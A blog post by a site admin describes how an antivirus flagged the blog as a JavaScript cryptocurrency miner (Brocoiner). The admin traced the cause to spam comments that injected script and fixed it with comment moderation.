Trojan : HTML/Brocoiner!rfn

Trojan : HTML/Brocoiner!rfn Yes, this is the first time the admin was surprised when this blog was detected that there was some kind of malware.

We also do a check on the blog theme, we trace the java script code one by one and we don’t find anything suspicious.

We even assumed that maybe the browser was infected with malware… it turned out that after we opened our other website… no antivirus threads appeared… aka clean..

That means we focus on finding the root of the problem on the rahmancyber.net website
What is the real reason…

even if we did a scan on VirusTotal, we couldn’t find any viruses on the website, aka it’s safe.

Let’s try to trace the code CE94BF5164C04AE312403C4CA6A85F4F3B1133A2 , on antivirus detection, because when we search for d4yukyzu.default.. we don’t find any information about it..

As a result, we get information from other friends abroad… through posts on the forum that it is a bitcoin miner domains.

then we also get information from microsoft about the Trojan:

id="simpleDrawer">

Windows Defender Antivirus detects and removes this threat.

This malware is a JavaScript cryptocurrency miner that is being served on web pages. When a computer visits one of these web pages, this JavaScript malware launches locally and uses the computer’s resources to mine cryptocurrency. Such mining activities can be resource intensive and can cause visiting computers to slow down.

Known samples of this malware have been observed mining Monero coin, a type of cryptocurrency. These samples were found in websites providing:

  • Streaming videos
  • Adult content
  • Shopping

Some sites hosting this malware appear legitimate and might have been compromised for this purpose.

==================

This

makes us find a bright spot, it turns out that the comment gap that has existed in blogger so far can be a gateway for inserting script code,

then we went through every comment …. and it turns out there are comments about online poker and friends …
we just clean it .. and we try to test the website as a whole ..

As

a result.. the website is back to normal..
as a preventive measure.. now we don’t immediately publish every incoming comment.. aka we give moderation approval… so that it is hoped that it will reduce the appearance of spammers who stop by the RahmanCyber.net website…

Hopefully this can be a lesson for other blogger friends.. to activate the comment restriction feature on the website.. or you can turn off the autoscripting function in the comment box on your website.

==========
RahmanCyber ​​NET Admin Note 12/4/2017



Create by Ipadguides in category of Blog